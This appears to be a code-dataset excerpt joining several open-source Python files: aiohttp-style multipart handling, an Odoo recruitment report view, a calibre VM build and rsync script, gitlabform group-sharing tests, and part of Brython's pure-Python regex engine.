:param dict headers: Response headers
"""
ctype = headers.get(CONTENT_TYPE, '')
mtype, *_ = parse_mimetype(ctype)
if mtype == 'multipart':
if self.multipart_reader_cls is None:
return type(self)(headers, self._content)
return self.multipart_reader_cls(headers, self._content)
else:
return self.part_reader_cls(self._boundary, headers, self._content)
def _get_boundary(self):
mtype, *_, params = parse_mimetype(self.headers[CONTENT_TYPE])
assert mtype == 'multipart', 'multipart/* content type expected'
if 'boundary' not in params:
raise ValueError('boundary missed for Content-Type: %s'
% self.headers[CONTENT_TYPE])
boundary = params['boundary']
if len(boundary) > 70:
raise ValueError('boundary %r is too long (70 chars max)'
% boundary)
return boundary
@asyncio.coroutine
def _readline(self):
if self._unread:
return self._unread.pop()
return (yield from self._content.readline())
@asyncio.coroutine
def _read_until_first_boundary(self):
while True:
chunk = yield from self._readline()
if chunk == b'':
raise ValueError("Could not find starting boundary %r"
% (self._boundary))
chunk = chunk.rstrip()
if chunk == self._boundary:
return
elif chunk == self._boundary + b'--':
self._at_eof = True
return
@asyncio.coroutine
def _read_boundary(self):
chunk = (yield from self._readline()).rstrip()
if chunk == self._boundary:
pass
elif chunk == self._boundary + b'--':
self._at_eof = True
else:
raise ValueError('Invalid boundary %r, expected %r'
% (chunk, self._boundary))
@asyncio.coroutine
def _read_headers(self):
lines = [b'']
while True:
chunk = yield from self._content.readline()
chunk = chunk.strip()
lines.append(chunk)
if not chunk:
break
parser = HttpParser()
headers, *_ = parser.parse_headers(lines)
return headers
@asyncio.coroutine
def _maybe_release_last_part(self):
"""Ensures that the last read body part is read completely."""
if self._last_part is not None:
if not self._last_part.at_eof():
yield from self._last_part.release()
self._unread.extend(self._last_part._unread)
self._last_part = None
class BodyPartWriter(object):
"""Multipart writer for single body part."""
def __init__(self, obj, headers=None, *, chunk_size=8192):
if headers is None:
headers = CIMultiDict()
elif not isinstance(headers, CIMultiDict):
headers = CIMultiDict(headers)
self.obj = obj
self.headers = headers
self._chunk_size = chunk_size
self._fill_headers_with_defaults()
self._serialize_map = {
bytes: self._serialize_bytes,
str: self._serialize_str,
io.IOBase: self._serialize_io,
MultipartWriter: self._serialize_multipart,
('application', 'json'): self._serialize_json,
('application', 'x-www-form-urlencoded'): self._serialize_form
}
def _fill_headers_with_defaults(self):
if CONTENT_TYPE not in self.headers:
content_type = self._guess_content_type(self.obj)
if content_type is not None:
self.headers[CONTENT_TYPE] = content_type
if CONTENT_LENGTH not in self.headers:
content_length = self._guess_content_length(self.obj)
if content_length is not None:
self.headers[CONTENT_LENGTH] = str(content_length)
if CONTENT_DISPOSITION not in self.headers:
filename = self._guess_filename(self.obj)
if filename is not None:
self.set_content_disposition('attachment', filename=filename)
def _guess_content_length(self, obj):
if isinstance(obj, bytes):
return len(obj)
elif isinstance(obj, str):
*_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
charset = params.get('charset', 'us-ascii')
return len(obj.encode(charset))
elif isinstance(obj, io.StringIO):
*_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
charset = params.get('charset', 'us-ascii')
return len(obj.getvalue().encode(charset)) - obj.tell()
elif isinstance(obj, io.BytesIO):
return len(obj.getvalue()) - obj.tell()
elif isinstance(obj, io.IOBase):
try:
return os.fstat(obj.fileno()).st_size - obj.tell()
except (AttributeError, OSError):
return None
else:
return None
def _guess_content_type(self, obj, default='application/octet-stream'):
if hasattr(obj, 'name'):
name = getattr(obj, 'name')
return mimetypes.guess_type(name)[0]
elif isinstance(obj, (str, io.StringIO)):
return 'text/plain; charset=utf-8'
else:
return default
def _guess_filename(self, obj):
if isinstance(obj, io.IOBase):
name = getattr(obj, 'name', None)
if name is not None:
return Path(name).name
def serialize(self):
"""Yields byte chunks for body part."""
has_encoding = (
CONTENT_ENCODING in self.headers and
self.headers[CONTENT_ENCODING] != 'identity' or
CONTENT_TRANSFER_ENCODING in self.headers
)
if has_encoding:
# since we're following streaming approach which doesn't assumes
# any intermediate buffers, we cannot calculate real content length
# with the specified content encoding scheme. So, instead of lying
# about content length and cause reading issues, we have to strip
# this information.
self.headers.pop(CONTENT_LENGTH, None)
if self.headers:
yield b'\r\n'.join(
b': '.join(map(lambda i: i.encode('latin1'), item))
for item in self.headers.items()
)
yield b'\r\n\r\n'
yield from self._maybe_encode_stream(self._serialize_obj())
yield b'\r\n'
def _serialize_obj(self):
obj = self.obj
mtype, stype, *_ = parse_mimetype(self.headers.get(CONTENT_TYPE))
serializer = self._serialize_map.get((mtype, stype))
if serializer is not None:
return serializer(obj)
for key in self._serialize_map:
if not isinstance(key, tuple) and isinstance(obj, key):
return self._serialize_map[key](obj)
return self._serialize_default(obj)
def _serialize_bytes(self, obj):
yield obj
def _serialize_str(self, obj):
*_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
yield obj.encode(params.get('charset', 'us-ascii'))
def _serialize_io(self, obj):
while True:
chunk = obj.read(self._chunk_size)
if not chunk:
break
if isinstance(chunk, str):
yield from self._serialize_str(chunk)
else:
yield from self._serialize_bytes(chunk)
def _serialize_multipart(self, obj):
yield from obj.serialize()
def _serialize_json(self, obj):
*_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
yield json.dumps(obj).encode(params.get('charset', 'utf-8'))
def _serialize_form(self, obj):
if isinstance(obj, Mapping):
obj = list(obj.items())
return self._serialize_str(urlencode(obj, doseq=True))
def _serialize_default(self, obj):
raise TypeError('unknown body part type %r' % type(obj))
def _maybe_encode_stream(self, stream):
if CONTENT_ENCODING in self.headers:
stream = self._apply_content_encoding(stream)
if CONTENT_TRANSFER_ENCODING in self.headers:
stream = self._apply_content_transfer_encoding(stream)
yield from stream
def _apply_content_encoding(self, stream):
encoding = self.headers[CONTENT_ENCODING].lower()
if encoding == 'identity':
yield from stream
elif encoding in ('deflate', 'gzip'):
if encoding == 'gzip':
zlib_mode = 16 + zlib.MAX_WBITS
else:
zlib_mode = -zlib.MAX_WBITS
zcomp = zlib.compressobj(wbits=zlib_mode)
for chunk in stream:
yield zcomp.compress(chunk)
else:
yield zcomp.flush()
else:
raise RuntimeError('unknown content encoding: {}'
''.format(encoding))
def _apply_content_transfer_encoding(self, stream):
encoding = self.headers[CONTENT_TRANSFER_ENCODING].lower()
if encoding == 'base64':
buffer = bytearray()
while True:
if buffer:
div, mod = divmod(len(buffer), 3)
chunk, buffer = buffer[:div * 3], buffer[div * 3:]
if chunk:
yield base64.b64encode(chunk)
chunk = next(stream, None)
if not chunk:
if buffer:
yield base64.b64encode(buffer[:])
return
buffer.extend(chunk)
elif encoding == 'quoted-printable':
for chunk in stream:
yield binascii.b2a_qp(chunk)
else:
raise RuntimeError('unknown content transfer encoding: {}'
''.format(encoding))
def set_content_disposition(self, disptype, **params):
"""Sets ``Content-Disposition`` header.
:param str disptype: Disposition type: inline, attachment, form-data.
Should be valid extension token (see RFC 2183)
:param dict params: Disposition params
"""
if not disptype or not (TOKEN > set(disptype)):
raise ValueError('bad content disposition type {!r}'
''.format(disptype))
value = disptype
if params:
lparams = []
for key, val in params.items():
if not key or not (TOKEN > set(key)):
raise ValueError('bad content disposition parameter'
' {!r}={!r}'.format(key, val))
qval = quote(val, '')
lparams.append((key, '"%s"' % qval))
if key == 'filename':
lparams.append(('filename*', "utf-8''" + qval))
sparams = '; '.join('='.join(pair) for pair in lparams)
value = '; '.join((value, sparams))
self.headers[CONTENT_DISPOSITION] = value
@property
def filename(self):
"""Returns filename specified in Content-Disposition header or ``None``
if missed."""
_, params = parse_content_disposition(
self.headers.get(CONTENT_DISPOSITION))
return content_disposition_filename(params)
class MultipartWriter(object):
"""Multipart body writer."""
#: Body part reader class for non multipart/* content types.
part_writer_cls = BodyPartWriter
def __init__(self, subtype='mixed', boundary=None):
boundary = boundary if boundary is not None else uuid.uuid4().hex
try:
boundary.encode('us-ascii')
except UnicodeEncodeError:
raise ValueError('boundary should contains ASCII only chars')
self.headers = CIMultiDict()
self.headers[CONTENT_TYPE] = 'multipart/{}; boundary="{}"'.format(
subtype, boundary
)
self.parts = []
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __iter__(self):
return iter(self.parts)
def __len__(self):
return len(self.parts)
@property
def boundary(self):
*_, params = parse_mimetype(self.headers.get(CONTENT_TYPE))
return params['boundary'].encode('us-ascii')
def append(self, obj, headers=None):
"""Adds a new body part to multipart writer."""
if isinstance(obj, self.part_writer_cls):
if headers:
obj.headers.update(headers)
self.parts.append(obj)
else:
if not headers:
headers = CIMultiDict()
self.parts.append(self.part_writer_cls(obj, headers))
return self.parts[-1]
def append_json(self, obj, headers=None):
"""Helper to append JSON part."""
if not headers:
headers = CIMultiDict()
headers[CONTENT_TYPE] = 'application/json'
return self.append(obj, headers)
def append_form(self, obj, headers=None):
"""Helper to append form urlencoded part."""
if not headers:
headers = CIMultiDict()
headers[CONTENT_TYPE] = 'application/x-www-form-urlencoded'
assert isinstance(obj, (Sequence, Mapping))
return self.append(obj, headers)
def serialize(self):
"""Yields multipart byte chunks."""
if not self.parts:
yield b''
return
for part in self.parts:
yield b'--' + self.boundary + b'\r\n'
yield from part.serialize()
else:
yield b'--' + self.boundary + b'--\r\n'
yield b''
| apache-2.0 |
doomsterinc/odoo | addons/hr_recruitment/report/hr_recruitment_report.py | 325 | 4836 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
from .. import hr_recruitment
from openerp.addons.decimal_precision import decimal_precision as dp
class hr_recruitment_report(osv.Model):
_name = "hr.recruitment.report"
_description = "Recruitments Statistics"
_auto = False
_rec_name = 'date_create'
_order = 'date_create desc'
_columns = {
'user_id': fields.many2one('res.users', 'User', readonly=True),
'company_id': fields.many2one('res.company', 'Company', readonly=True),
'date_create': fields.datetime('Create Date', readonly=True),
'date_last_stage_update': fields.datetime('Last Stage Update', readonly=True),
'date_closed': fields.date('Closed', readonly=True),
'job_id': fields.many2one('hr.job', 'Applied Job',readonly=True),
'stage_id': fields.many2one ('hr.recruitment.stage', 'Stage'),
'type_id': fields.many2one('hr.recruitment.degree', 'Degree'),
'department_id': fields.many2one('hr.department','Department',readonly=True),
'priority': fields.selection(hr_recruitment.AVAILABLE_PRIORITIES, 'Appreciation'),
'salary_prop' : fields.float("Salary Proposed", digits_compute=dp.get_precision('Account')),
'salary_prop_avg' : fields.float("Avg. Proposed Salary", group_operator="avg", digits_compute=dp.get_precision('Account')),
'salary_exp' : fields.float("Salary Expected", digits_compute=dp.get_precision('Account')),
'salary_exp_avg' : fields.float("Avg. Expected Salary", group_operator="avg", digits_compute=dp.get_precision('Account')),
'partner_id': fields.many2one('res.partner', 'Partner',readonly=True),
'available': fields.float("Availability"),
'delay_close': fields.float('Avg. Delay to Close', digits=(16,2), readonly=True, group_operator="avg",
help="Number of Days to close the project issue"),
'last_stage_id': fields.many2one ('hr.recruitment.stage', 'Last Stage'),
}
def init(self, cr):
tools.drop_view_if_exists(cr, 'hr_recruitment_report')
cr.execute("""
create or replace view hr_recruitment_report as (
select
min(s.id) as id,
s.create_date as date_create,
date(s.date_closed) as date_closed,
s.date_last_stage_update as date_last_stage_update,
s.partner_id,
s.company_id,
s.user_id,
s.job_id,
s.type_id,
sum(s.availability) as available,
s.department_id,
s.priority,
s.stage_id,
s.last_stage_id,
sum(salary_proposed) as salary_prop,
(sum(salary_proposed)/count(*)) as salary_prop_avg,
sum(salary_expected) as salary_exp,
(sum(salary_expected)/count(*)) as salary_exp_avg,
extract('epoch' from (s.write_date-s.create_date))/(3600*24) as delay_close,
count(*) as nbr
from hr_applicant s
group by
s.date_open,
s.create_date,
s.write_date,
s.date_closed,
s.date_last_stage_update,
s.partner_id,
s.company_id,
s.user_id,
s.stage_id,
s.last_stage_id,
s.type_id,
s.priority,
s.job_id,
s.department_id
)
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
sss/calibre-at-bzr | setup/installer/__init__.py | 3 | 6660 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import subprocess, tempfile, os, time, socket
from setup import Command, installer_name
from setup.build_environment import HOST, PROJECT
BASE_RSYNC = ['rsync', '-avz', '--delete', '--force']
EXCLUDES = []
for x in [
'src/calibre/plugins', 'src/calibre/manual', 'src/calibre/trac',
'.bzr', '.git', '.build', '.svn', 'build', 'dist', 'imgsrc', '*.pyc', '*.pyo', '*.swp',
'*.swo', 'format_docs']:
EXCLUDES.extend(['--exclude', x])
SAFE_EXCLUDES = ['"%s"'%x if '*' in x else x for x in EXCLUDES]
def get_rsync_pw():
return open('/home/kovid/work/kde/conf/buildbot').read().partition(
':')[-1].strip()
def is_vm_running(name):
pat = '/%s/'%name
pids= [pid for pid in os.listdir('/proc') if pid.isdigit()]
for pid in pids:
try:
cmdline = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read()
except IOError:
continue # file went away
if 'vmware-vmx' in cmdline and pat in cmdline:
return True
return False
class Rsync(Command):
description = 'Sync source tree from development machine'
SYNC_CMD = ' '.join(BASE_RSYNC+SAFE_EXCLUDES+
['rsync://buildbot@{host}/work/{project}', '..'])
def run(self, opts):
cmd = self.SYNC_CMD.format(host=HOST, project=PROJECT)
env = dict(os.environ)
env['RSYNC_PASSWORD'] = get_rsync_pw()
self.info(cmd)
subprocess.check_call(cmd, shell=True, env=env)
class Push(Command):
description = 'Push code to another host'
def run(self, opts):
from threading import Thread
threads = []
for host, vmname in {
r'Owner@winxp:/cygdrive/c/Documents\ and\ Settings/Owner/calibre':'winxp',
'kovid@ox:calibre':None,
r'kovid@win7:/cygdrive/c/Users/kovid/calibre':'Windows 7',
'kovid@getafix:calibre-src':None,
}.iteritems():
if '@getafix:' in host and socket.gethostname() == 'getafix':
continue
if vmname is None or is_vm_running(vmname):
rcmd = BASE_RSYNC + EXCLUDES + ['.', host]
print '\n\nPushing to:', vmname or host, '\n'
threads.append(Thread(target=subprocess.check_call, args=(rcmd,),
kwargs={'stdout':open(os.devnull, 'wb')}))
threads[-1].start()
for thread in threads:
thread.join()
class VMInstaller(Command):
EXTRA_SLEEP = 5
INSTALLER_EXT = None
VM = None
VM_NAME = None
VM_CHECK = None
FREEZE_COMMAND = None
FREEZE_TEMPLATE = 'python setup.py {freeze_command}'
SHUTDOWN_CMD = ['sudo', 'poweroff']
IS_64_BIT = False
BUILD_CMD = 'ssh -t %s bash build-calibre'
BUILD_PREFIX = ['#!/bin/bash', 'export CALIBRE_BUILDBOT=1']
BUILD_RSYNC = [r'cd ~/build/{project}', Rsync.SYNC_CMD]
BUILD_CLEAN = ['rm -rf dist/* build/* src/calibre/plugins/*']
BUILD_BUILD = ['python setup.py build',]
def add_options(self, parser):
if not parser.has_option('--dont-shutdown'):
parser.add_option('-s', '--dont-shutdown', default=False,
action='store_true', help='Dont shutdown the VM after building')
if not parser.has_option('--vm'):
parser.add_option('--vm', help='Path to VM launcher script')
def get_build_script(self):
rs = ['export RSYNC_PASSWORD=%s'%get_rsync_pw()]
ans = '\n'.join(self.BUILD_PREFIX + rs)+'\n\n'
ans += ' && \\\n'.join(self.BUILD_RSYNC) + ' && \\\n'
ans += ' && \\\n'.join(self.BUILD_CLEAN) + ' && \\\n'
ans += ' && \\\n'.join(self.BUILD_BUILD) + ' && \\\n'
ans += self.FREEZE_TEMPLATE.format(freeze_command=self.FREEZE_COMMAND) + '\n'
ans = ans.format(project=PROJECT, host=HOST)
return ans
def vmware_started(self):
return 'started' in subprocess.Popen('/etc/init.d/vmware status', shell=True, stdout=subprocess.PIPE).stdout.read()
def start_vmware(self):
if not self.vmware_started():
if os.path.exists('/dev/kvm'):
subprocess.check_call('sudo rmmod -w kvm-intel kvm', shell=True)
subprocess.Popen('sudo /etc/init.d/vmware start', shell=True)
def stop_vmware(self):
while True:
try:
subprocess.check_call('sudo /etc/init.d/vmware stop', shell=True)
break
except:
pass
while 'vmblock' in open('/proc/modules').read():
subprocess.check_call('sudo rmmod -f vmblock')
def run_vm(self):
if is_vm_running(self.VM_CHECK or self.VM_NAME):
return
self.__p = subprocess.Popen([self.vm])
def start_vm(self, sleep=75):
ssh_host = self.VM_NAME
self.run_vm()
build_script = self.get_build_script()
t = tempfile.NamedTemporaryFile(suffix='.sh')
t.write(build_script)
t.flush()
print 'Waiting for VM to startup'
while subprocess.call('ping -q -c1 '+ssh_host, shell=True,
stdout=open('/dev/null', 'w')) != 0:
time.sleep(5)
time.sleep(self.EXTRA_SLEEP)
print 'Trying to SSH into VM'
subprocess.check_call(('scp', t.name, ssh_host+':build-calibre'))
subprocess.check_call(self.BUILD_CMD%ssh_host, shell=True)
def installer(self):
return installer_name(self.INSTALLER_EXT, self.IS_64_BIT)
def run(self, opts):
for x in ('dont_shutdown', 'vm'):
setattr(self, x, getattr(opts, x))
if self.vm is None:
self.vm = self.VM
if not self.vmware_started():
self.start_vmware()
subprocess.call(['chmod', '-R', '+r', 'recipes'])
self.start_vm()
self.download_installer()
if not self.dont_shutdown:
subprocess.call(['ssh', self.VM_NAME]+self.SHUTDOWN_CMD)
def download_installer(self):
installer = self.installer()
subprocess.check_call(['scp',
self.VM_NAME+':build/calibre/'+installer, 'dist'])
if not os.path.exists(installer):
self.warn('Failed to download installer: '+installer)
raise SystemExit(1)
def clean(self):
installer = self.installer()
if os.path.exists(installer):
os.remove(installer)
| gpl-3.0 |
egnyte/gitlabform | gitlabform/gitlabform/test/test_group_shared_with.py | 1 | 5232 | import pytest
from gitlabform.gitlabform.test import (
run_gitlabform,
)
@pytest.fixture(scope="function")
def one_owner(gitlab, group, groups, users):
gitlab.add_member_to_group(group, users[0], 50)
gitlab.remove_member_from_group(group, "root")
yield group
# we are running tests with root's token, so every group is created
# with a single user - root as owner. we restore the group to
# this state here.
gitlab.add_member_to_group(group, "root", 50)
# we try to remove all users, not just those added above,
# on purpose, as more may have been added in the tests
for user in users:
gitlab.remove_member_from_group(group, user)
for share_with in groups:
gitlab.remove_share_from_group(group, share_with)
class TestGroupSharedWith:
def test__add_group(self, gitlab, group, users, groups, one_owner):
no_of_members_before = len(gitlab.get_group_members(group))
add_shared_with = f"""
projects_and_groups:
{group}/*:
group_members:
{users[0]}:
access_level: 50
group_shared_with:
{groups[0]}:
group_access_level: 30
{groups[1]}:
group_access_level: 30
"""
run_gitlabform(add_shared_with, group)
members = gitlab.get_group_members(group)
assert len(members) == no_of_members_before, members
shared_with = gitlab.get_group_shared_with(group)
assert len(shared_with) == 2
def test__remove_group(self, gitlab, group, users, groups, one_owner):
gitlab.add_share_to_group(group, groups[0], 50)
gitlab.add_share_to_group(group, groups[1], 50)
no_of_members_before = len(gitlab.get_group_members(group))
no_of_shared_with_before = len(gitlab.get_group_shared_with(group))
remove_group = f"""
projects_and_groups:
{group}/*:
enforce_group_members: true
group_members:
{users[0]}:
access_level: 50
group_shared_with:
{groups[0]}:
group_access_level: 30
"""
run_gitlabform(remove_group, group)
members = gitlab.get_group_members(group)
assert len(members) == no_of_members_before
shared_with = gitlab.get_group_shared_with(group)
assert len(shared_with) == no_of_shared_with_before - 1
assert [sw["group_name"] for sw in shared_with] == [groups[0]]
def test__not_remove_groups_with_enforce_false(
self, gitlab, group, users, groups, one_owner
):
no_of_members_before = len(gitlab.get_group_members(group))
no_of_shared_with_before = len(gitlab.get_group_shared_with(group))
setups = [
# flag explicitly set to false
f"""
projects_and_groups:
{group}/*:
enforce_group_members: false
group_members:
{users[0]}:
access_level: 50
group_shared_with: []
""",
# flag not set at all (but the default is false)
f"""
projects_and_groups:
{group}/*:
group_members:
{users[0]}:
access_level: 50
group_shared_with: []
""",
]
for setup in setups:
run_gitlabform(setup, group)
members = gitlab.get_group_members(group)
assert len(members) == no_of_members_before
members_usernames = {member["username"] for member in members}
assert members_usernames == {
f"{users[0]}",
}
shared_with = gitlab.get_group_shared_with(group)
assert len(shared_with) == no_of_shared_with_before
def test__change_group_access(self, gitlab, group, groups, users, one_owner):
change_some_users_access = f"""
projects_and_groups:
{group}/*:
group_members:
{users[0]}:
access_level: 50
group_shared_with:
{groups[0]}:
group_access_level: 30
{groups[1]}:
group_access_level: 50
"""
run_gitlabform(change_some_users_access, group)
shared_with = gitlab.get_group_shared_with(group)
for shared_with_group in shared_with:
if shared_with_group["group_name"] == f"{groups[0]}":
assert shared_with_group["group_access_level"] == 30
if shared_with_group["group_name"] == f"{groups[1]}":
assert shared_with_group["group_access_level"] == 50
def test__remove_all(self, gitlab, group, users, one_owner):
no_shared_with = f"""
projects_and_groups:
{group}/*:
enforce_group_members: true
group_members:
{users[0]}:
access_level: 50
group_shared_with: []
"""
run_gitlabform(no_shared_with, group)
shared_with = gitlab.get_group_shared_with(group)
assert len(shared_with) == 0
| mit |
GodBlessPP/W17test_2nd_1 | static/Brython3.1.1-20150328-091302/Lib/_sre.py | 622 | 51369 | # NOT_RPYTHON
"""
A pure Python reimplementation of the _sre module from CPython 2.4
Copyright 2005 Nik Haldimann, licensed under the MIT license
This code is based on material licensed under CNRI's Python 1.6 license and
copyrighted by: Copyright (c) 1997-2001 by Secret Labs AB
"""
MAXREPEAT = 2147483648
#import array
import operator, sys
from sre_constants import ATCODES, OPCODES, CHCODES
from sre_constants import SRE_INFO_PREFIX, SRE_INFO_LITERAL
from sre_constants import SRE_FLAG_UNICODE, SRE_FLAG_LOCALE
import sys
# Identifying as _sre from Python 2.3 or 2.4
#if sys.version_info[:2] >= (2, 4):
MAGIC = 20031017
#else:
# MAGIC = 20030419
# In _sre.c this is bytesize of the code word type of the C implementation.
# There it's 2 for normal Python builds and more for wide unicode builds (large
# enough to hold a 32-bit UCS-4 encoded character). Since here in pure Python
# we only see re bytecodes as Python longs, we shouldn't have to care about the
# codesize. But sre_compile will compile some stuff differently depending on the
# codesize (e.g., charsets).
# starting with python 3.3 CODESIZE is 4
#if sys.maxunicode == 65535:
# CODESIZE = 2
#else:
CODESIZE = 4
copyright = "_sre.py 2.4c Copyright 2005 by Nik Haldimann"
def getcodesize():
return CODESIZE
def compile(pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
"""Compiles (or rather just converts) a pattern descriptor to a SRE_Pattern
object. Actual compilation to opcodes happens in sre_compile."""
return SRE_Pattern(pattern, flags, code, groups, groupindex, indexgroup)
def getlower(char_ord, flags):
if (char_ord < 128) or (flags & SRE_FLAG_UNICODE) \
or (flags & SRE_FLAG_LOCALE and char_ord < 256):
#return ord(unichr(char_ord).lower())
return ord(chr(char_ord).lower())
else:
return char_ord
class SRE_Pattern:
def __init__(self, pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
self.pattern = pattern
self.flags = flags
self.groups = groups
self.groupindex = groupindex # Maps group names to group indices
self._indexgroup = indexgroup # Maps indices to group names
self._code = code
def match(self, string, pos=0, endpos=sys.maxsize):
"""If zero or more characters at the beginning of string match this
regular expression, return a corresponding MatchObject instance. Return
None if the string does not match the pattern."""
state = _State(string, pos, endpos, self.flags)
if state.match(self._code):
return SRE_Match(self, state)
return None
def search(self, string, pos=0, endpos=sys.maxsize):
"""Scan through string looking for a location where this regular
expression produces a match, and return a corresponding MatchObject
instance. Return None if no position in the string matches the
pattern."""
state = _State(string, pos, endpos, self.flags)
if state.search(self._code):
return SRE_Match(self, state)
else:
return None
def findall(self, string, pos=0, endpos=sys.maxsize):
"""Return a list of all non-overlapping matches of pattern in string."""
matchlist = []
state = _State(string, pos, endpos, self.flags)
while state.start <= state.end:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
match = SRE_Match(self, state)
if self.groups == 0 or self.groups == 1:
item = match.group(self.groups)
else:
item = match.groups("")
matchlist.append(item)
if state.string_position == state.start:
state.start += 1
else:
state.start = state.string_position
return matchlist
def _subx(self, template, string, count=0, subn=False):
filter = template
if not callable(template) and "\\" in template:
# handle non-literal strings ; hand it over to the template compiler
#import sre #sre was renamed to re
#fix me brython
#print("possible issue at _sre.py line 116")
import re as sre
filter = sre._subx(self, template)
state = _State(string, 0, sys.maxsize, self.flags)
sublist = []
n = last_pos = 0
while not count or n < count:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
if last_pos < state.start:
sublist.append(string[last_pos:state.start])
if not (last_pos == state.start and
last_pos == state.string_position and n > 0):
# the above ignores empty matches on latest position
if callable(filter):
sublist.append(filter(SRE_Match(self, state)))
else:
sublist.append(filter)
last_pos = state.string_position
n += 1
if state.string_position == state.start:
state.start += 1
else:
state.start = state.string_position
if last_pos < state.end:
sublist.append(string[last_pos:state.end])
item = "".join(sublist)
if subn:
return item, n
else:
return item
def sub(self, repl, string, count=0):
"""Return the string obtained by replacing the leftmost non-overlapping
occurrences of pattern in string by the replacement repl."""
return self._subx(repl, string, count, False)
def subn(self, repl, string, count=0):
"""Return the tuple (new_string, number_of_subs_made) found by replacing
the leftmost non-overlapping occurrences of pattern with the replacement
repl."""
return self._subx(repl, string, count, True)
def split(self, string, maxsplit=0):
"""Split string by the occurrences of pattern."""
splitlist = []
state = _State(string, 0, sys.maxsize, self.flags)
n = 0
last = state.start
while not maxsplit or n < maxsplit:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
if state.start == state.string_position: # zero-width match
if last == state.end: # or end of string
break
state.start += 1
continue
splitlist.append(string[last:state.start])
# add groups (if any)
if self.groups:
match = SRE_Match(self, state)
splitlist.extend(list(match.groups(None)))
n += 1
last = state.start = state.string_position
splitlist.append(string[last:state.end])
return splitlist
def finditer(self, string, pos=0, endpos=sys.maxsize):
"""Return a list of all non-overlapping matches of pattern in string."""
#scanner = self.scanner(string, pos, endpos)
_list=[]
_m=self.scanner(string, pos, endpos)
_re=SRE_Scanner(self, string, pos, endpos)
_m=_re.search()
while _m:
_list.append(_m)
_m=_re.search()
return _list
#return iter(scanner.search, None)
def scanner(self, string, start=0, end=sys.maxsize):
return SRE_Scanner(self, string, start, end)
def __copy__(self):
raise TypeError("cannot copy this pattern object")
def __deepcopy__(self):
raise TypeError("cannot copy this pattern object")
class SRE_Scanner:
"""Undocumented scanner interface of sre."""
def __init__(self, pattern, string, start, end):
self.pattern = pattern
self._state = _State(string, start, end, self.pattern.flags)
def _match_search(self, matcher):
state = self._state
state.reset()
state.string_position = state.start
match = None
if matcher(self.pattern._code):
match = SRE_Match(self.pattern, state)
if match is None or state.string_position == state.start:
state.start += 1
else:
state.start = state.string_position
return match
def match(self):
return self._match_search(self._state.match)
def search(self):
return self._match_search(self._state.search)
class SRE_Match:
def __init__(self, pattern, state):
self.re = pattern
self.string = state.string
self.pos = state.pos
self.endpos = state.end
self.lastindex = state.lastindex
if self.lastindex < 0:
self.lastindex = None
self.regs = self._create_regs(state)
#statement below is not valid under python3 ( 0 <= None)
#if pattern._indexgroup and 0 <= self.lastindex < len(pattern._indexgroup):
if self.lastindex is not None and pattern._indexgroup and 0 <= self.lastindex < len(pattern._indexgroup):
# The above upper-bound check should not be necessary, as the re
# compiler is supposed to always provide an _indexgroup list long
# enough. But the re.Scanner class seems to screw up something
# there, test_scanner in test_re won't work without upper-bound
# checking. XXX investigate this and report bug to CPython.
self.lastgroup = pattern._indexgroup[self.lastindex]
else:
self.lastgroup = None
def _create_regs(self, state):
"""Creates a tuple of index pairs representing matched groups."""
regs = [(state.start, state.string_position)]
for group in range(self.re.groups):
mark_index = 2 * group
if mark_index + 1 < len(state.marks) \
and state.marks[mark_index] is not None \
and state.marks[mark_index + 1] is not None:
regs.append((state.marks[mark_index], state.marks[mark_index + 1]))
else:
regs.append((-1, -1))
return tuple(regs)
def _get_index(self, group):
if isinstance(group, int):
if group >= 0 and group <= self.re.groups:
return group
else:
if group in self.re.groupindex:
return self.re.groupindex[group]
raise IndexError("no such group")
def _get_slice(self, group, default):
group_indices = self.regs[group]
if group_indices[0] >= 0:
return self.string[group_indices[0]:group_indices[1]]
else:
return default
def start(self, group=0):
"""Returns the indices of the start of the substring matched by group;
group defaults to zero (meaning the whole matched substring). Returns -1
if group exists but did not contribute to the match."""
return self.regs[self._get_index(group)][0]
def end(self, group=0):
"""Returns the indices of the end of the substring matched by group;
group defaults to zero (meaning the whole matched substring). Returns -1
if group exists but did not contribute to the match."""
return self.regs[self._get_index(group)][1]
def span(self, group=0):
"""Returns the 2-tuple (m.start(group), m.end(group))."""
return self.start(group), self.end(group)
def expand(self, template):
"""Return the string obtained by doing backslash substitution and
resolving group references on template."""
import sre
return sre._expand(self.re, self, template)
def groups(self, default=None):
"""Returns a tuple containing all the subgroups of the match. The
default argument is used for groups that did not participate in the
match (defaults to None)."""
groups = []
for indices in self.regs[1:]:
if indices[0] >= 0:
groups.append(self.string[indices[0]:indices[1]])
else:
groups.append(default)
return tuple(groups)
def groupdict(self, default=None):
"""Return a dictionary containing all the named subgroups of the match.
The default argument is used for groups that did not participate in the
match (defaults to None)."""
groupdict = {}
for key, value in self.re.groupindex.items():
groupdict[key] = self._get_slice(value, default)
return groupdict
def group(self, *args):
"""Returns one or more subgroups of the match. Each argument is either a
group index or a group name."""
if len(args) == 0:
args = (0,)
grouplist = []
for group in args:
grouplist.append(self._get_slice(self._get_index(group), None))
